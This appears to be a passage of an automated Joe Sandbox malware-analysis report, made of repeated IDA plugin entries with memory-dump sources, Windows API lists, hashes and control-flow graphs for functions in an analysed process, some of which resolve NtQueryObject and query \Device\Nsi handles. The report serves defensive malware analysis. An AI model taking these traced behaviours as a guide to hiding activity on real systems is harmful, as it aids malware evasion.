                              • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction ID: 497626b688fa208a2d0e75bd0d1a95d2d2150a163d6f07e6c1532d26b3d1371f
                              • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction Fuzzy Hash: A1114C79630A01B2FF60F7E0A58D39A3A98A79435DF504129DC0EA91DCEF78C8F48600

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileHandleType
                              • String ID:
                              • API String ID: 3000768030-0
                              • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction ID: d76ab1b63436527dd2fd55dd6876ec577c9a221d3f9b6f45a8d40b37e7fb72ec
                              • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction Fuzzy Hash: 86316D22620B48A1EB60AB54958826D3B58F345BB8F690309DF6F5B3F8CB35D9F5D340

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileHandleType
                              • String ID:
                              • API String ID: 3000768030-0
                              • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction ID: b2f5a0ae9d7adcffb3a5536e8cdbbb616dfc05b995ba303f969827cf16ec9179
                              • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction Fuzzy Hash: 7F317062620B48A1DF60AB6496882693F50F345BA8F640309DFAF4B3F8CB35D4F5D340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction ID: c66b6f17edb6aed950081c1acac2aef9e72592f04daf45e015d68e73afa786b0
                              • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction Fuzzy Hash: B4911573B0125197EF64AF65D408B6DBBD1FB54B9CF588124AE4D0B788DB38E8A2C710

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0000022413901724: GetProcessHeap.KERNEL32 ref: 000002241390172F
                                • Part of subcall function 0000022413901724: HeapAlloc.KERNEL32 ref: 000002241390173E
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139017AE
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139017DB
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139017F5
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901815
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901830
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901850
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390186B
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 000002241390188B
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139018A6
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139018C6
                              • SleepEx.KERNELBASE ref: 0000022413901BDF
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139018E1
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901901
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390191C
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 000002241390193C
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901957
                                • Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901977
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901992
                                • Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390199C
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CloseOpen$Heap$AllocProcessSleep
                              • String ID:
                              • API String ID: 948135145-0
                              • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction ID: 9c0cdb6d02bcc8beafeba063a33bbb3d7e345248edf6c49f588808c222826217
                              • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction Fuzzy Hash: 2431CEED220A51B1FF50BBA6D54A3693BE9AB44BD8F045421DE0D8F79EDF24C8F08214

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 368 22413902ff0-22413903069 370 22413903384-224139033a7 368->370 371 2241390306f-22413903075 368->371 371->370 372 2241390307b-2241390307e 371->372 372->370 373 22413903084-22413903087 372->373 373->370 374 2241390308d-2241390309d GetModuleHandleA 373->374 375 2241390309f-224139030af GetProcAddress 374->375 376 224139030b1 374->376 377 224139030b4-224139030d2 375->377 376->377 377->370 379 224139030d8-224139030f7 StrCmpNIW 377->379 379->370 380 224139030fd-22413903101 379->380 380->370 381 22413903107-22413903111 380->381 381->370 382 22413903117-2241390311e 381->382 382->370 383 22413903124-22413903137 382->383 384 22413903147 383->384 385 22413903139-22413903145 383->385 386 2241390314a-2241390314e 384->386 385->386 387 2241390315e 386->387 388 22413903150-2241390315c 386->388 389 22413903161-2241390316b 387->389 388->389 390 22413903251-22413903255 389->390 391 22413903171-22413903174 389->391 392 22413903376-2241390337e 390->392 393 2241390325b-2241390325e 390->393 394 22413903186-22413903190 391->394 395 22413903176-22413903183 call 22413901a30 391->395 392->370 392->383 396 2241390326f-22413903279 393->396 397 22413903260-2241390326c call 22413901a30 393->397 399 224139031c4-224139031ce 394->399 400 22413903192-2241390319f 394->400 395->394 404 224139032a9-224139032ac 396->404 405 2241390327b-22413903288 396->405 397->396 401 224139031fe-22413903201 399->401 402 224139031d0-224139031dd 399->402 400->399 407 224139031a1-224139031ae 400->407 410 2241390320f-2241390321c lstrlenW 401->410 411 22413903203-2241390320d call 22413901cc4 401->411 402->401 408 224139031df-224139031ec 402->408 413 224139032b9-224139032c6 lstrlenW 404->413 414 224139032ae-224139032b7 call 22413901cc4 404->414 405->404 412 2241390328a-22413903297 405->412 415 224139031b1-224139031b7 407->415 420 224139031ef-224139031f5 408->420 423 2241390321e-2241390322d call 22413901cfc 410->423 424 2241390322f-22413903241 call 22413903f88 410->424 411->410 416 22413903247-2241390324c 411->416 422 2241390329a-224139032a0 412->422 418 224139032c8-224139032d7 call 22413901cfc 413->418 419 224139032d9-224139032e3 call 22413903f88 413->419 414->413 431 224139032ee-224139032f9 414->431 415->416 417 224139031bd-224139031c2 415->417 426 224139032e6-224139032e8 416->426 417->399 417->415 418->419 418->431 419->426 420->416 429 224139031f7-224139031fc 420->429 422->431 432 224139032a2-224139032a7 422->432 423->416 423->424 424->416 424->426 426->392 426->431 429->401 429->420 439 224139032fb-224139032ff 431->439 440 22413903370-22413903374 431->440 432->404 432->422 442 22413903307-22413903321 call 22413913a40 439->442 443 22413903301-22413903305 439->443 440->392 444 22413903324-22413903327 442->444 443->442 443->444 447 22413903329-22413903347 call 22413913a40 444->447 448 2241390334a-2241390334d 444->448 447->448 448->440 450 2241390334f-2241390336d call 22413913a40 448->450 450->440
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: faa7fcf7ab9cdbba3380709f1f11f8b4081d59ba603d0993fa58a43c1ac90868
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: 62B19362230690A2EF55AFAAD58875ABBA8F744B9CF445016EE0D5B79CDF35CCE0C340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 454 22413932ff0-22413933069 456 22413933384-224139333a7 454->456 457 2241393306f-22413933075 454->457 457->456 458 2241393307b-2241393307e 457->458 458->456 459 22413933084-22413933087 458->459 459->456 460 2241393308d-2241393309d GetModuleHandleA 459->460 461 2241393309f-224139330af GetProcAddress 460->461 462 224139330b1 460->462 463 224139330b4-224139330d2 461->463 462->463 463->456 465 224139330d8-224139330f7 StrCmpNIW 463->465 465->456 466 224139330fd-22413933101 465->466 466->456 467 22413933107-22413933111 466->467 467->456 468 22413933117-2241393311e 467->468 468->456 469 22413933124-22413933137 468->469 470 22413933147 469->470 471 22413933139-22413933145 469->471 472 2241393314a-2241393314e 470->472 471->472 473 2241393315e 472->473 474 22413933150-2241393315c 472->474 475 22413933161-2241393316b 473->475 474->475 476 22413933251-22413933255 475->476 477 22413933171-22413933174 475->477 480 22413933376-2241393337e 476->480 481 2241393325b-2241393325e 476->481 478 22413933186-22413933190 477->478 479 22413933176-22413933183 call 22413931a30 477->479 483 224139331c4-224139331ce 478->483 484 22413933192-2241393319f 478->484 479->478 480->456 480->469 485 2241393326f-22413933279 481->485 486 22413933260-2241393326c call 22413931a30 481->486 491 224139331fe-22413933201 483->491 492 224139331d0-224139331dd 483->492 484->483 490 224139331a1-224139331ae 484->490 487 2241393327b-22413933288 485->487 488 224139332a9-224139332ac 485->488 486->485 487->488 494 2241393328a-22413933297 487->494 495 224139332b9-224139332c6 lstrlenW 488->495 496 224139332ae-224139332b7 call 22413931cc4 488->496 497 224139331b1-224139331b7 490->497 500 2241393320f-2241393321c lstrlenW 491->500 501 22413933203-2241393320d call 22413931cc4 491->501 492->491 498 224139331df-224139331ec 492->498 503 2241393329a-224139332a0 494->503 509 224139332d9-224139332e3 call 22413933f88 495->509 510 224139332c8-224139332d7 call 22413931cfc 495->510 496->495 513 224139332ee-224139332f9 496->513 507 22413933247-2241393324c 497->507 508 224139331bd-224139331c2 497->508 511 224139331ef-224139331f5 498->511 504 2241393322f-22413933241 call 22413933f88 500->504 505 2241393321e-2241393322d call 22413931cfc 500->505 501->500 501->507 503->513 514 224139332a2-224139332a7 503->514 504->507 518 224139332e6-224139332e8 504->518 505->504 505->507 507->518 508->483 508->497 509->518 510->509 510->513 511->507 521 224139331f7-224139331fc 511->521 522 224139332fb-224139332ff 513->522 523 22413933370-22413933374 513->523 514->488 514->503 518->480 518->513 521->491 521->511 528 22413933307-22413933321 call 22413943a40 522->528 529 22413933301-22413933305 522->529 523->480 530 22413933324-22413933327 528->530 529->528 529->530 533 2241393334a-2241393334d 530->533 534 22413933329-22413933347 call 22413943a40 530->534 533->523 536 2241393334f-2241393336d call 22413943a40 533->536 534->533 536->523
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: ab9313a2783b2c27c4f0a96b88eedfc967908d1178cd4875f63d8fc1c3dd74b5
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: 14B183A2234690A2EF54AFB5D688799BBA4F744B88F445016EE0D5B7ACDF35CCE4C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: 0498aa1dbc29374422a96932197095c888f62193c30f87e463b033fc6eee01ba
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: F2316F72325B80D6EB60AFA0E8443ED7764F788758F44442ADE4E5BB98DF78C698C710
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: e15c45c713a06b50ee8ece8ea4f3ee4c1bbed9dfdda644c8eb08eb4835d559d3
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: 9E315072215B80D6EF64AFA0E8443ED7764F784748F44442ADE4E4BB99EF78C598C710
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: 7ea823d6189b7573bec4f0af993b78936321b9b892c5dcb7711c6ffe02fc81d5
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: 39418D32224F80D6EB60DF65E84439E7BA4F788768F540125EE8D5BB98DF38C5A5CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: e8db32560768e090ef3704fc7e388940164e28af2572e3d7df4e56153dbb77b6
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: 69416236224F8096DB60DFB5E84439E77A4F788758F500125EE9D4BBA8DF38C5A5CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 776d68c7eba99e32be5247fa9ed47b0f6f1487eba6b02807f9c376964d5059a3
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: 9CA1D822724681A9FF20BBB5A4883AD7FA9E741B9CF144115DE5D2FA9DDA38C4E1C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 2bf1fb57dd21c23cfd6284a090775e6b6934a6b5f4ce0aa804996e7be4086b72
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: B9A1F7A272468165FF20ABB5E6683AD7FA1E74179CF144115DE9C2FABDCA34C4E1C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: f98951ee6a5d0b79b4de4d5562e651eca8c5bad4e36fe470e1c74e0056a119e3
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: 0E113026721F049AEF40DFA0E8593A937A4F71976CF440E21DE6D5A7A8DF78C5A4C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: ed9897c711d40394cd197855c17d5ccb05c1122834e2a7d72c664195d32a48a9
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction Fuzzy Hash: 5711C425621B80D1EE55EBA6A40815A7BB5F788FD4F5D4024DE4E5B729DF38C892C300
                              APIs
                                • Part of subcall function 000002241390D220: HeapAlloc.KERNEL32(?,?,00000000,000002241390C987), ref: 000002241390D275
                                • Part of subcall function 0000022413910EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022413910EEB
                              • FindFirstFileExW.KERNEL32 ref: 000002241390DB99
                                • Part of subcall function 000002241390D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2B6
                                • Part of subcall function 000002241390D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2C0
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 2436724071-0
                              • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                              • Instruction ID: 1b0d8e01587559f9ce4049a66e287763439e839d45d3381aace20028859b0066
                              • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                              • Instruction Fuzzy Hash: FF81FA22324780A5FF20FBA5A54836EBF99E7457D8F044115AEAD1B79DDF38C4E18700
                              APIs
                                • Part of subcall function 000002241393D220: HeapAlloc.KERNEL32(?,?,00000000,000002241393C987), ref: 000002241393D275
                                • Part of subcall function 0000022413940EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022413940EEB
                              • FindFirstFileExW.KERNEL32 ref: 000002241393DB99
                                • Part of subcall function 000002241393D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2B6
                                • Part of subcall function 000002241393D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2C0
                              Memory Dump Source
